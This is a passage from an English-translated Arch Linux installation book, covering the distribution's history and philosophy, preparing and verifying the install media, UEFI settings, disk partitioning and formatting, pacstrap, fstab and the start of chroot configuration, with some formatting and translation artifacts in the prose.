Chapter 1: Introduction, Philosophy and Preparation of the Environment ↑ Home

Welcome to "The Big Book of Arch Linux." This manual isn't simply a tutorial to help you install an operating system and forget about it; it's an architectural journey. Arch Linux isn't a finished product; it's a toolkit designed to help you build your own custom operating system. If you're here, you're probably tired of distributions that make decisions for you, install dozens of background services you don't use, and hide the inner workings under cumbersome graphical interfaces.

In this foundational chapter, we'll explore Arch's history, the unwavering philosophical pillars that dictate its development, the real-world implications of the Rolling Release model in production environments, and how to prepare your installation media using industry best practices.

1.1 History and Birth of an Idea ↑ Home

Arch Linux was conceived in March 2002 by Judd Vinet, a Canadian programmer and musician. Vinet was deeply inspired by a minimalist distribution called CRUX. While he appreciated the elegance and build-from-source nature of CRUX (and Gentoo), Vinet wanted something more pragmatic: a system that maintained that structural purity but used pre-compiled binary packages to save the user the massive hours of compilation required by Gentoo.

That's how it was born pacman(Package Manager), originally written in C by Vinet himself. The goal was simple: to track dependencies with surgical precision and install pre-packaged binaries incredibly quickly. Since 2007, Aaron Griffin has led the project, followed by Levente Polyak. Today, Arch Linux is a massive, community-supported project, but it still maintains its original vision.

1.2 Philosophy: The Arch Way ↑ Home

In the Arch Linux ecosystem, documentation isn't a suggestion, it's the law. The entire project is governed by a set of principles informally known as The Arch Way . Understanding them will save you a lot of frustration.

1.2.1 Simplicidad (KISS - Keep It Simple, Stupid)

In the context of Arch, "simplicity" doesn't mean "easy for your grandma to use." It doesn't mean big buttons and wizards that do the work for you. In fact, for Arch, those wizards add complexity . Simplicity is defined from a technical and internal perspective. A simple system is one that has the fewest possible modifications to the original (vanilla) code. Arch Linux delivers software exactly as its original (upstream) developers designed it. There are no massive Arch patches, no hidden configurations, and startup scripts don't perform "magic." If you want a daemon to run, you have to type the command to enable it. Arch's simplicity lies in knowing exactly what your system is doing because you built it .

1.2.2 Modernity (Bleeding Edge)

Arch Linux strives to maintain the latest stable software versions. As soon as the developers of the Linux kernel or the KDE Plasma desktop release a new version and it's compiled, it arrives in your repositories within days or even hours. This gives you immediate support for the newest hardware on the market and the latest technologies (like PipeWire or Wayland). The inherent downside is that you're on the "Bleeding Edge" ; if there's a bug in the newly released code, you'll be among the first in the world to experience it.

1.2.3 Pragmatism

While the GNU project and distributions like Trisquel have a strict moral stance that prohibits any software that isn't open source, Arch is deeply pragmatic. While it prefers free software for technical and ethical reasons, it won't hesitate to provide proprietary drivers (such as those for NVIDIA graphics cards) or closed binary firmware if that's what the user's hardware needs to function properly. Decisions are made based on technical consensus and practical usability, not political dogma.

1.2.4 User-Centric (User-Centric vs User-Friendly)

Distributions like Ubuntu or Linux Mint are user-friendly : they try to anticipate user needs, automatically configuring printers, mounting USB drives, and installing office suites by default. Arch Linux is user-centric : it relies entirely on the intelligence and technical skills of its users. It assumes you're willing to read the manual, investigate problems, and take full control. Arch doesn't tell you which desktop environment to use; it simply provides the building blocks for you to construct. You are the architect.

1.3 The Rolling Release vs. Fixed Release Model ↑ Home

Understanding your operating system's lifecycle is crucial for its maintenance. The software industry primarily uses two update distribution models.

1.3.1 The Fixed Release Model

Used by Debian, Ubuntu, Fedora and Windows.

• How it works: Every few months or years, a new version is released (e.g., Ubuntu 22.04). During the lifecycle of that version, the core software (kernel, desktop environment, base libraries) is frozen . If Firefox releases a new feature, Ubuntu doesn't give it to you immediately; you'll only receive security patches for the older version that came with the system.
• Advantages: Extreme stability. Since nothing changes, things don't break unexpectedly. Ideal for critical servers in banking or aerospace applications.
• Disadvantages: The software becomes obsolete quickly. To get new features, you have to perform a massive "Version Upgrade" (e.g., upgrading to Ubuntu 24.04), which often involves gigabytes of dependencies changing all at once, running a high risk of breaking the system.

1.3.2 The Rolling Release Model

Used by Arch Linux, Gentoo and openSUSE Tumbleweed.

• How it works: There are no versions like "Arch Linux 2024." Arch Linux is a constant stream of seamless updates. You install the system only once . From then on, you run your package manager periodically, and each individual package is updated to its latest version.
• Advantages: You have a modern system forever ("Install once, update forever"). Performance improves with new kernel versions. You fix zero-day security vulnerabilities instantly.
• Disadvantages: It requires active maintenance. You can't leave a machine running Arch powered off for eight months, turn it on, and release an update; the accumulated changes in the C or Python libraries will conflict with each other, and the system will require manual intervention. Furthermore, the responsibility for ensuring that an update doesn't break a very specific workflow falls on the user.

1.4 Comparison: Where does Arch fit into the Ecosystem? ↑ Home

• Compared to Ubuntu/Pop!_OS: These distributions are excellent for newcomers or developers who want a ready-to-use environment in 10 minutes. However, their heavy use of Snap packages and PPAs (Personal Package Archives) often creates fragmented systems (like Franken-Debians). Arch eliminates PPAs and unifies everything under the AUR.
• Compared to Debian: Debian is the unshakeable rock of stability. It's unbeatable for servers where uptime is measured in years. Arch is the complete opposite: it's dynamic, fast-moving, and ideal for developer workstations, gaming, and agile web servers.
• Compared to Fedora: Fedora is the middle ground. It has very new software, but follows a 6-month Fixed Release model supported by Red Hat. Arch beats Fedora in the vastness of its community repository (the AUR) and in the lightness of its base installation (Fedora tends to pre-install many corporate services like SELinux or firewalld by default).
• Compared to Gentoo: In Gentoo, you compile absolutely everything from source code for your specific processor. It takes days to install. Arch gives you pre-compiled binary packages, offering 99% of Gentoo's customization in a fraction of the installation time.

1.5 The Arch Wiki: The Penguin Oracle ^ Home

(wiki.archlinux.org) cannot be overstated The importance of the Arch Wiki . It is, by unanimous consensus in the computer community, the most comprehensive, best-maintained, and technically accurate documentation for GNU/Linux systems on the internet. Users of almost every other distribution end up on the Arch Wiki when they Google how to troubleshoot a network problem, compile a kernel, or configure Bluetooth.

Arch User Golden Rules:

1. If you have a problem or want to install something new, search the Wiki first .
2. If the Wiki refers you to a manual page (man page), read it ( man nombredelcomando).
3. Only if the Wiki and the manual don't answer your question should you turn to the forums or Reddit. The community expects you to have done your homework before asking; the phrase "Read The F*cking Manual (RTFM)" isn't an insult in Arch, it's a reminder of the philosophy.

1.6 Preparing the Installation Media (Live USB) ↑ Home

To begin our journey, we need to download and prepare the installation media. The Arch Linux ISO is a fully functional, compressed Linux system that boots from RAM.

1.6.1 Cryptographic Download and Verification

Go to the official downloads page: https://archlinux.org/download/It is strongly recommended to use the BitTorrent or Magnet link protocol. This not only reduces the load on the organization's servers, but the Torrent protocol also automatically verifies the integrity of the downloaded fragments using SHA-1 hashes.

If you download via direct download (HTTP), you must verify the integrity and authenticity of the ISO file. A corrupted file will cause unexplained failures during installation. Even worse, an attacker could have injected malware into the ISO (supply chain attack).

To verify, download the ISO and the PGP signature file (ending in .sig) in the same folder. On an existing Linux or macOS machine, run:

# Importar la llave pública del desarrollador de Arch (Pierre Schmitz)
gpg --keyserver-options auto-key-retrieve --verify archlinux-version-x86_64.iso.sig

The output should say "Good signature from...". If it says "BAD signature", the file is corrupt or compromised. Delete it immediately.

1.6.2 Creating the Bootable USB (Low-level Flashing)

Tools that simply extract the contents of the ISO to a FAT32-formatted USB drive will not work with Arch, as the Arch ISO is a hybrid (it contains boot sectors for both UEFI and BIOS). We need to perform a bit-by-bit copy (block-level copy).

Method 1: From Linux systems (The dd tool) The command dd(Data Duplicator, or jokingly known as Disk Destroyer) is the most powerful and dangerous way to burn images. One mistake in the disk drive letter will irreversibly erase your current system.

1. Find out the path of your connected USB using lsblkLet's assume it's /dev/sdbthe /dev/sdc(NEVER use a partition number as sdb1Use the root drive sdb).
2. Make sure it is not mounted: sudo umount /dev/sdb*
3. Record the image:

    sudo dd if=archlinux-2024.xx.xx-x86_64.iso of=/dev/sdb bs=4M status=progress oflag=sync

• if: Input File (tu ISO).
• of: Output File (tu USB crudo).
• bs=4M: Writes in 4 megabyte blocks for greater speed.
• status=progress: Displays a progress bar.
• oflag=sync: Ensures that all data in the cache is physically written to the USB before the command finishes.

Method 2: From Windows systems For users coming from Windows, Rufus or BalenaEtcher is recommended .

1. In Rufus , select your USB drive.
2. Select the Arch Linux ISO file.
3. When you click "Start," Rufus will issue a warning about the "ISOHybrid" format. You must select the "Write in DD Image mode" option. If you select ISO mode, the USB drive will not boot.

Method 3: Ventoy (The Professional Standard) If you frequently work with multiple operating systems, Ventoy is a game-changer. You install Ventoy on your USB drive just once, and it creates a data partition. From then on, you simply copy and paste (drag and drop) all your files. .iso(Arch, Windows, Ubuntu, rescue tools) to that partition. When you boot from the USB, Ventoy will display a menu allowing you to choose which ISO to boot from. Arch Linux natively supports booting via Ventoy.

1.6.3 Motherboard Configuration (UEFI)

Before inserting your USB drive, you must prepare the target machine:

1. Turn on the device and repeatedly press the firmware key (usually F2, F12, Delete, or Esc).
2. Disable Secure Boot . Unlike Fedora or Ubuntu, Arch Linux does not purchase cryptographic keys from Microsoft to sign its default bootloader. If Secure Boot is enabled, the motherboard will refuse to boot from the Arch USB drive. (In advanced chapters, you will learn how to sign your own kernel and re-enable it.)
3. Disable Fast Boot if you're dual-booting. Fast Boot doesn't actually shut down Windows; it hibernates it, leaving the hard drives locked and inaccessible (Read-Only) for Linux. Windows
4. Make sure the SATA storage control mode is set to AHCI and not RAID/RST (Intel Rapid Storage Technology). The Linux kernel needs to see the disks in raw configuration through AHCI.
5. Place the USB drive at the top of the boot priority (Boot Order).

Save the changes, restart, and you'll be ready to delve into the black terminal prompt. If you've made it this far, you possess the necessary theoretical knowledge; Chapter 2 (which we've already generated) awaits you to get your hands dirty with physical partitioning.

Chapter 2: Basic Installation - Fundamentals and Systems Architecture ↑ Home

Installing Arch Linux is often seen by newcomers as an insurmountable obstacle, an archaic rite of passage. However, for the systems professional or developer, it's a masterclass in how to build a GNU/Linux operating system from the ground up. Unlike automated installers such as Calamares or Anaconda, which abstract away complexity and make architectural decisions for you, "The Arch Way" process requires you to understand every component of the technology stack: from the motherboard firmware to the package manager.

In this comprehensive chapter, you'll learn not only the commands needed to install the system, but also the theory and reasoning behind each one. By the end, you'll be equipped not only to install Arch, but also to recover crashed Linux servers, design secure storage architectures, and understand the boot process at an enterprise level.

2.1 The Live Environment and the Initial Boot Process ↑ Start

When you insert your USB installation media and power on your computer, you enter a critical phase controlled by your motherboard's firmware. There are two main firmware paradigms in modern computing, and understanding the difference is vital, as it will dictate how we partition our disks later on.

2.1.1 BIOS Legacy vs. UEFI

BIOS (Basic Input/Output System) y MBR

The BIOS is the firmware standard introduced in the 1980s. When a BIOS system boots, it performs a hardware check (POST) and then looks for the MBR (Master Boot Record) , which is a tiny 512-byte space at the beginning of your hard drive. In this minuscule space, the boot manager (such as GRUB) must house its core code. The limitations of the BIOS and the MBR are severe by modern standards.

• It only supports disks up to 2 Terabytes.
• It only allows 4 primary partitions (requiring "extended" and "logical" partitions to overcome this).
• The startup is sequential and often slow.

UEFI (Unified Extensible Firmware Interface) y GPT

Widely introduced starting in 2012, UEFI is a mini-operating system in its own right. Instead of searching for code in a small 512-byte sector, UEFI looks for a specific partition on the disk formatted in FAT32, known as the EFI System Partition (ESP) . Within this partition, UEFI reads executable files (with the .exe extension). .efiThe partitioning scheme that accompanies UEFI is GPT (GUID Partition Table) , which:

• It supports disks up to 9.4 Zettabytes.
• It allows up to 128 partitions by default in Windows/Linux.
• Stores backup copies of the partition table at the end of the disk for redundancy in case of corruption.

Identifying the environment in Arch Linux: When you boot from the Arch USB, you will arrive at a terminal ( tty1) logged in as rootwith a Zsh prompt. The first step as administrator is to confirm in which mode the firmware has booted. Arch Linux mounts the virtual EFI variables in /sys/firmware/efi/efivars. Run:

ls /sys/firmware/efi/efivars

• If the directory exists and displays hundreds of files, your system has booted in UEFI mode . You will need to use GPT partitioning. This guide will focus on UEFI as it is the absolute standard.
• If it throws an error ( No such file or directory), you are in BIOS/Legacy mode . (If your computer is modern but booted into BIOS, it is recommended to restart, enter the motherboard settings and force UEFI mode "UEFI Only" or disable "CSM / Compatibility Support Module").

2.1.2 The Zsh Environment of Archiso

The system you are currently using is ephemeral. It runs entirely in your computer's RAM (tmpfs). Any changes you make here (except writing to physical disks) will be lost upon reboot. The official Arch Linux ISO (archiso) provides a rich environment with diagnostic tools: iproute2, vim, nano, parted, cryptsetupand data recovery utilities.

The keyboard is configured by default to the US layout. Working with symbols such as /, -the :It's frustrating when the distribution is incorrect. To load it in Spanish:

# Para teclado de España (incluye la Ñ y símbolos correctos)
loadkeys es

# Para teclado latinoamericano
loadkeys la-latin1

Technical data: loadkeysinteracts with the subsystem kbdfrom the Linux kernel, loading a keymap .map.gzstored in /usr/share/kbd/keymaps/.

2.2 Network Subsystem: Connectivity and Synchronization ↑ Home

Arch Linux does not include the operating system packages in the installation ISO file (unlike Ubuntu or Debian). The ISO only contains the live base environment. Therefore, a stable internet connection is the most important non-negotiable requirement . All binaries and dependencies will be downloaded directly from the global repositories during the installation phase. pacstrap.

2.2.1 Interfaces de Red (Ethernet)

The Linux kernel, through udevIt assigns predictable network interface names (Predictable Network Interface Names) to network interfaces, instead of the old ones. eth0the wlan0You'll see names like enp3s0 (Ethernet, bus PCI 3, slot 0) o wlp2s0 (Wireless).

To list your network interfaces and check their status:

ip link

If you connect an Ethernet cable, the daemon systemd-networkdThe operating system running from the Live USB will detect the connection and automatically request an IP address from your router using DHCP. You can verify that you have an IP address with:

ip -brief address show

And test DNS resolution and connectivity:

ping -c 4 archlinux.org

2.2.2 Wireless Networks (Wi-Fi) with iwd

If you rely on Wi-Fi, the Arch ISO includes iNet Wireless Daemon (iwd) , written by Intel. It's a modern and extremely fast daemon that replaces the older one. wpa_supplicant.

To configure the connection interactively, invoke the client:

iwctl

The prompt will change to [iwd]#The logical sequence of commands is:

1. Identify the radio adapter:

[iwd]# device listLet's assume the device name (Name) is wlan0.

1. Activate the network scanner:

[iwd]# station wlan0 scan

1. List the available networks:

[iwd]# station wlan0 get-networks

1. Connect to the network (SSID):

[iwd]# station wlan0 connect "Nombre De Tu Red WiFi"If the network name has spaces, use quotation marks. It will ask for the passphrase. After entering it and pressing Enter, exit the iwd prompt using exitthe Ctrl+D.

Troubleshooting Wi-Fi: If your adapter does not appear in device listIt is highly likely that it requires proprietary firmware that is not included in the default ISO (common with certain Broadcom chips or very specific Realtek USB adapters). In that case, the only solution is to use an Ethernet cable or tether your mobile phone's internet connection via a USB cable (Linux will automatically detect the phone as a wired network interface).

2.2.3 Cryptography and Time Synchronization (NTP)

Before downloading packages from the internet, your system clock must be accurate. Why? The Arch package manager ( pacman) verifies the GPG cryptographic signatures of each downloaded package to prevent Man-in-the-Middle attacks and ensure that the package legitimately comes from an Arch developer. If your motherboard clock is months or years behind, the digital certificates will be evaluated as "invalid" or "expired," and pacman will refuse to install anything, returning "corrupted package" or "invalid PGP signature" errors.

To synchronize the time using Network Time Protocol (NTP):

timedatectl set-ntp true

To verify that the system has synchronized correctly:

timedatectl status

Look for the line that says NTP service: active and System clock synchronized: yesAlso, make sure that the "Universal Time (UTC)" is correct. Linux prefers that the motherboard's hardware clock (RTC) be set to UTC and calculates your local time by adding or subtracting depending on your time zone.

2.3 Advanced Storage and Partitioning Architecture ↑ Home

Partitioning is the foundation of your home. A poor design here will limit the future flexibility of your server or workstation. Linux treats everything in the operating system as a file, and hard drives are no exception. They reside in the directory /dev/ (devices).

2.3.1 Block Device Nomenclature

Before modifying the disks, we must identify them with absolute certainty. Selecting the wrong device means irretrievable data loss. Run the command to list block devices:

lsblk -f

(The flag) -fIt displays existing file systems and their UUIDs.

• SATA (Traditional mechanical hard drives and SSDs): They are called sd(SCSI disk). The first disk is /dev/sdathe second /dev/sdbThe partitions are numbered: /dev/sda1, /dev/sda2.
• NVMe (modern PCIe SSDs): They have their own nomenclature to reduce SCSI layer latency. They are called nvmeXnY(where X is the controller and Y is the namespace). Example: /dev/nvme0n1Partitions add a 'p': /dev/nvme0n1p1.
• eMMC (Common in cheap laptops or Raspberry Pi): They are called /dev/mmcblk0.
• Loop devices: You'll see many /dev/loopXThese are files from the ISO itself loaded into RAM and you can completely ignore them.

From this point on, we will assume that we are installing Arch Linux on the main NVMe SSD disk: /dev/nvme0n1If you have a SATA drive, simply replace the path with /dev/sdain the relevant commands.

2.3.2 LVM, LUKS and Partitioning Schemes

There are multiple ways to partition your disk, ranging from simple to enterprise architecture:

1. Basic Outline (Recommended for beginners):

• EFI Partition (Boot) - FAT32.
• Partition Swap - Linux Swap.
• Root Partition ( /) - Ext4 from Btrfs.

1. LVM (Logical Volume Manager):

LVM introduces an abstraction layer over physical disks. Instead of having static partitions, you group several physical disks (Physical Volumes) into a giant "pool" (Volume Group), and from there you extract elastic "Logical Volumes." If in the future you run out of space in /homeYou can buy another hard drive, add it to the Volume Group, and expand the partition. /homehot, without restarting.

1. LUKS (Linux Unified Key Setup) - Full Disk Encryption (FDE):

If it's a laptop, encryption is mandatory in professional environments. LUKS creates a block-level encrypted container. Without the decryption password entered in the boot manager, the data on the SSD is unreadable random noise, protecting your SSH keys, source code, and client data in case of hardware theft.

In this manual, we will address the Basic Scheme with static partitions , but adapted to current best practices.

2.3.3 Destruction of the previous table and creation of GPT

We will use cgdisk(ncurses-based visual interface for GPT disks) or fdiskThe classic and most universal standard is fdisk.

Start fdisk pointing to your target disk:

fdisk /dev/nvme0n1

In the fdisk interactive prompt:

1. Create a new empty partition table (Total erase): Press g(creates a new GPT table). Attention! From this moment on, you have marked the disk to delete all previous partitions.

1. Create the EFI (Boot) partition:

• Credit n(new partition).
• Partition number: 1(press enter).
• First sector: Press enter (uses the default start).
• Last section: Write +1Gand press enter. (Although the absolute minimum is 260MB for Windows and 512MB for Linux, 1GB is recommended nowadays if you plan to install multiple Linux kernels simultaneously, as modern initramfs files are large.)
• Change type: Press t, then 1to select the "EFI System" type.

1. Create the Swap partition:

Swap memory acts as an overflow when your physical RAM is full, preventing the kernel from applying an OOM Killer (forced application closure). It is also essential if you want to use the Hibernation function (Suspend to disk).

• Credit n.
• Partition number: 2 (enter).
• First sector: enter.
• Last section: Write +8G(Or the equivalent of your RAM if you plan to hibernate. For example, if you have 16GB of RAM, you can put +16G).
• Change type: Press t, select the partition 2and write 19 (Linux Swap).

1. Create the Root partition (Root - /):

This is where the entire operating system, binaries, configurations, and your personal files will reside (unless you create a separate partition for /home(which is simpler for modern desktop installations).

• Credit n.
• Partition number: 3 (enter).
• First sector: enter.
• Last sector: enter (by not setting a limit, it will use all the remaining free space on the disk, which is ideal).
• The default type will be "Linux filesystem" (type 20), so there is no need to change it.

1. Verification and Writing:

Credit pTo print the table you just designed, you should see:

• /dev/nvme0n1p1 - 1G - EFI System
• /dev/nvme0n1p2 - 8G - Linux swap
• /dev/nvme0n1p3- (Remaining size) - Linux filesystem

If you are sure and everything is correct, press w(write) to write the changes to disk and exit. If you made a mistake, press qto exit without saving and start over.

2.4 File Systems and Formatting ↑ Home

Raw partitions are useless until they are given a file system, which dictates the algorithmic logic of how data is saved, indexed, and read. Linux excels in the variety and specialization of its filesystems.

2.4.1 File System Theory: Ext4 vs Btrfs vs XFS

• Ext4 (Fourth Extended Filesystem): It's the reliable granddaddy. Present since 2008, it's robust, rock-solid stable, and virtually immune to corruption from power outages thanks to its journaling design. If you want a system you can install and forget, Ext4 is the default choice.
• Btrfs (B-Tree Filesystem): Developed by Oracle and SUSE, it is a "next-generation" (copy-on-write) filesystem. It supports snapshots (system snapshots taken in milliseconds), on-the-fly compression (transparent zstd), and subvolumes. It is the default filesystem in Fedora and Garuda Linux. It allows for an incredible level of disaster recovery (you can restore the operating system to how it was 5 minutes ago), but requires more in-depth learning to manage its disk space, as snapshots silently consume disk space.
• XFS: Created by Silicon Graphics. It is the undisputed king for handling massively large files (such as enterprise databases or 8K video editing) due to its bandwidth allocation and parallel I/O capacity. It is the standard in Red Hat Enterprise Linux.

For this professional deployment manual, we will use Ext4 because of its resilience and universality, which reduces complexity in standard production and desktop environments.

2.4.2 Partition Formatting

The utility for formatting is mkfs (Make File System).

1. The EFI (Boot) partition: The UEFI specification strictly dictates that the EFI partition must be formatted in FAT32, a very old Microsoft file system, because it is the only one that motherboard firmwares can natively read.

mkfs.fat -F 32 /dev/nvme0n1p1

(Use: -F 32It specifies that FAT32 should be used, not FAT16. (It's a common mistake to forget this).

2. The Swap partition: Swap has its own specialized structure. It is initialized and then immediately activated so that the Live USB environment can use it if needed.

mkswap /dev/nvme0n1p2
swapon /dev/nvme0n1p2

3. The Root Partition (Ext4): We will format the bulk of the disk with Ext4. This process will build the inode table and the journal.

mkfs.ext4 /dev/nvme0n1p3

If you have chosen Btrfs (for advanced users), the command would be mkfs.btrfs /dev/nvme0n1p3.

2.4.3 Directory Tree Assembly

To install the system, we need to mount our new partitions within the virtual file tree of our Live USB. By convention, we will use the directory /mnt.

Order is critical. Always mount the root partition ( /) first, and then creates folders within it to mount subordinate partitions (such as boot or home).

Montar Root:

mount /dev/nvme0n1p3 /mnt

Preparing and mounting Boot/EFI: In Arch Linux, there are several debates about where to mount the EFI partition: /mnt/efi, /mnt/boot/efithe /mnt/bootMount it on /bootDirectly is the simplest and most recommended method if you use systemd-boot, and it works perfectly with GRUB, as it allows the kernels (vmlinuz) to be stored directly in the FAT32 partition where the UEFI firmware has direct and unrestricted access.

We create the directory in our new root and mount the partition:

mkdir /mnt/boot
mount /dev/nvme0n1p1 /mnt/boot

You can verify that your hierarchy is perfectly assembled with the command:

lsblk

You should see a hierarchical structure with /mntin your partition 3 and /mnt/bootin partition 1.

2.5 Installation of the Base Ecosystem (Pacstrap) ↑ Home

At this point, we've prepared the physical and logical groundwork. It's time to inject the operating system code. In other distributions, the installer simply copies the files from the ISO to the hard drive. In Arch, we use a script called pacstrapwhich is essentially a package manager wrapper pacman. pacstrapIt downloads the latest packages directly from the Arch Linux servers and installs (unzips and initializes) them within the folder /mntThis ensures that, upon completion of the installation, the system is 100% up to date with the latest version of all software (zero-day update).

2.5.1 Download Mirrors

pacstrapwill use the list of servers (mirrors) defined in /etc/pacman.d/mirrorlistIn the past, users had to manually search for the fastest servers in their country to avoid downloads at 1990s modem speeds. Today, the Arch ISO includes a background service called reflectorwhich automatically evaluates mirrors worldwide, ranks the 20 fastest, and updates the file mirrorlistfor you. If your connection is active, this step is already automatically optimized.

2.5.2 Selection of Nuclear Packages

The command pacstrapIt requires you to explicitly specify which package groups or individual packages will form your operating system. Arch's minimalism demands that you carefully consider your needs.

The fundamental elements of a modern GNU/Linux system are:

1. baseThis is an empty metapackage that indicates the minimum required dependencies. It will install the initialization system. systemd, pacman, C libraries (glibc), and core GNU utilities (coreutils) such as cp, ls, catImportant note: Since 2019 , the metapackage baseIt no longer includes a kernel, text editor, or network support. You must install these explicitly.
2. The Kernel ( linuxThis will download the kernel image and its modules. If you are a server administrator, you can choose to download the kernel image and its modules right here. linux-ltsWe will use the stable one linux.
3. Firmware ( linux-firmware) : Proprietary binary code that hardware manufacturers require for graphics cards, Wi-Fi adapters, and Bluetooth chips to function. Without it, you could have a working kernel, but no ability to communicate with your hardware.
4. Editors ( vimthe nanoThese are essential for modifying configuration files in the next step. Install the one you are most comfortable with. (Nano is intuitive, Vim is powerful).
5. Network tools ( networkmanagerand iwd) : If you do not install them now, when you restart your new machine you will find yourself without internet and completely unable to install the graphical environment.
6. CPU Microcode ( intel-ucodethe amd-ucode use Modern CPUs are so complex that they have their own internal software with bugs (remember Spectre or Meltdown). The operating system can inject patches into the CPU during boot. Depending on your physical machine's processor, you must install the corresponding patch package. If your processor is Intel, intel-ucodeIf it's AMD, use amd-ucode.

Run the deployment with the final orchestration command (let's assume an Intel CPU and Nano as the editor):

pacstrap -K /mnt base linux linux-firmware nano networkmanager iwd intel-ucode

(The flag) -Kinitializes a new, empty PGP keyring on the target system, ensuring a clean cryptographic environment for pacmanin the new facility).

The process will download between 400MB and 800MB depending on the packages, verify them, and install them on /mntObserve the output in the terminal; it's an X-ray of the Linux building blocks passing before your eyes.

2.6 Mount Persistence (fstab) ↑ Start

configuration file If you reboot now, your new operating system won't know which disk is the root and where the boot disk is located. We need to generate the fstab (File System Table) . The kernel reads /etc/fstabduring startup to know which partitions to mount and with what parameters (read only, enable quotas, disable access time cache, etc.).

Historically, fstab was written using static device paths (e.g. /dev/sda1This was catastrophic if you connected a USB drive and the kernel decided that the USB was now sdaand your hard drive became sdb are used To solve this architectural disaster, UUIDs (Universally Unique Identifiers) , 128-bit strings guaranteed to be unique in the universe, physically written in the file system metadata when you format it.

Arch provides the tool genfstabto automate this by detecting what is currently mounted on /mntand translating it into UUID format.

We execute:

genfstab -U /mnt >> /mnt/etc/fstab

(Syntax explanation: -UIt forces the use of UUIDs. >>It is a shell redirection operator (bash/zsh) that takes the output of the genfstab command (the generated text) and appends it to the end of the file /mnt/etc/fstab(creating it if it did not exist).

Fstab Auditing and Verification: In Linux, trust is good, but control is better. Never proceed without auditing automatically generated configuration files.

cat /mnt/etc/fstab

You should see a structure similar to this:

# /dev/nvme0n1p3
UUID=3a4b5c6d-7e8f-9a0b-1c2d-3e4f5a6b7c8d	/         	ext4      	rw,relatime	0 1

# /dev/nvme0n1p1
UUID=1234-ABCD      	/boot     	vfat      	rw,relatime,fmask=0022,dmask=0022,codepage=437,iocharset=ascii,shortname=mixed,utf8,errors=remount-ro	0 2

# /dev/nvme0n1p2
UUID=9f8e7d6c-5b4a-3f2e-1d0c-b9a8f7e6d5c4	none      	swap      	defaults  	0 0

Let's quickly analyze the fields:

• Device: The UUID of the partition.
• Mountpoint: Where the tree will be mounted ( /, /boot, nonefor swap).
• FSType: The file system type ( ext4, vfat, swap).
• Options: Special kernel options. rw(reading/writing), relatime(a crucial optimization that prevents the disk from writing metadata every time a file is read , saving countless SSD lifecycles).
• Dump & Pass: The last number indicates the order in which the utility fsck(File System Check) will check the disks for errors during startup. The Root partition should always be 1, and the other partitions 2(the 0to disable the check).

If the fstab file looks correct and isn't empty, you can breathe a huge sigh of relief. The physical, logical, and binary foundation of the operating system is now installed and consolidated on your hardware.

In the next and crucial chapter (Chapter 3), we will use the powerful concept of "Chroot" to mentally teleport ourselves into this new system and perform the final configuration (language, time zone, users) and, most importantly, install the brain that will orchestrate the boot process: the GRUB boot manager.

Chapter 3: The Chroot and Internal Configuration ↑ Home

After executing pacstrapIn the previous chapter, we downloaded hundreds of megabytes of binary software, neatly depositing it onto the hard drive (mounted on /mntHowever, at this time, we are still using the RAM and kernel of the temporary Live USB.

To set up your new system, you have to access it. You have to trick the commands you run into thinking the hard drive is the entire universe, completely hiding the existence of the USB drive. This computer magic trick is called Chroot (Change Root).

3.1 The Theory and Practice of the Chroot ↑ Home

chrootIt is an operation in Unix-like operating systems that changes the apparent root directory ( /This applies to the current process and all its subprocesses (children). Any program running within the chroot environment cannot see, access, or modify files outside the new root directory. It is one of the earliest forms of sandboxing, a precursor to modern Docker containers.

In Arch Linux, we use a souped-up version called arch-chroot, provided by the installation script package.

Why arch-chroot and not the normal bash chroot?

The command chrootcrude requires that, before entering the environment, you manually mount vital Kernel virtual file systems (API file systems) such as /dev(devices) /proc(process and kernel information), /sys(sysfs hardware devices) and /run(temporary daemon files). If you were to log in with a normal chroot without these mounts, utilities like grub-installThey would fail spectacularly if they couldn't find hard drives. arch-chrootIt automates the assembly of these virtual systems (bind mounts) and automatically configures them. resolv.confso that you can maintain your internet connection within the new environment.

3.1.1 Execution

Simply run:

arch-chroot /mnt

You'll notice that your terminal prompt changes slightly (usually going from a colorful zsh prompt to a basic bash one with [root@archiso /]#Congratulations! You have technically just logged into your own operating system installed on your NVMe/SATA drive, using your own newly downloaded binaries (your own version of bash, nano, pacman, etc.). All commands from this point forward will be permanently written to your disk.

3.2 Time Zone and Hardware Clock ↑ Home

A computer manages time using two different clocks:

1. System Time (Kernel/System Clock): A virtual clock in memory that resets when you shut down your computer. It is maintained by the kernel while the system is running, usually by synchronizing it over the internet using NTP.
2. Hardware Clock (RTC - Real Time Clock): A physical clock powered by the motherboard's CR2032 coin cell battery. It keeps track of the time when the computer is unplugged.

3.2.1 Time Zone Configuration

The system needs to know your physical location to add or subtract hours from the UTC universal clock. Time zone definitions are located in the directory /usr/share/zoneinfo/.

To list continents and regions (use the arrows to navigate, press 'q' to exit pagination):

ls /usr/share/zoneinfo

To see the cities in a region (for example, Europe):

ls /usr/share/zoneinfo/Europe

We created a symbolic link (a shortcut that points to the correct definition) in /etc/localtimeFor example, for Madrid, Spain:

ln -sf /usr/share/zoneinfo/Europe/Madrid /etc/localtime

(For Latin America you could use America/MexicoCity, America/BuenosAires, America/Bogota, etc.)

3.2.2 Hardware Clock Synchronization (hwclock)

Now that the system knows your time zone, we need to tell it to write this information and the current time to the motherboard's physical clock, automatically generating the file /etc/adjtime.

hwclock --systohc

By default, Linux assumes the hardware clock is set to UTC (Coordinated Universal Time). This is the correct and standard practice for servers. Linux will read UTC from the motherboard and calculate the local time based on the timezone you configured.

The Dual-Boot Problem with Windows: Windows, for historical reasons of compatibility with MS-DOS, absurdly assumes that the motherboard clock is set to Local Time . If you have both Windows and Linux installed, they will enter into a civil war: Linux will set the motherboard to UTC and display your correct local time. Upon restarting in Windows, it will read UTC, thinking it's your local time, and display the incorrect time. Windows will "correct" this by rewriting the motherboard, and upon switching back to Linux, Linux will be misconfigured. The professional solution: Don't force Linux to use Local Time. Open the Registry Editor in Windows ( regedit), navigates to HKEYLOCALMACHINE\System\CurrentControlSet\Control\TimeZoneInformationand creates a 32-bit DWORD called RealTimeIsUniversalwith value 1This forces Windows to behave like a modern system (using UTC on the motherboard).

3.3 System Location (Locale) and Language ↑ Home

The "locale" is a cornerstone of POSIX operating systems. It dictates not only the language (Spanish, English), but also how programs should interpret and classify characters, how to format numbers (decimal comma or period), the representation of dates, and the encoding of complex symbols (UTF-8). A misconfigured locale will result in accented letters appearing as question marks or strange boxes, or Python scripts breaking when reading text files.

3.3.1 Locale Generation (locale.gen)

In Arch Linux, you compile your own locales. First, you tell the system which ones you want to generate by enabling them in the master configuration file.

Open the file with your editor (we assume nano):

nano /etc/locale.gen

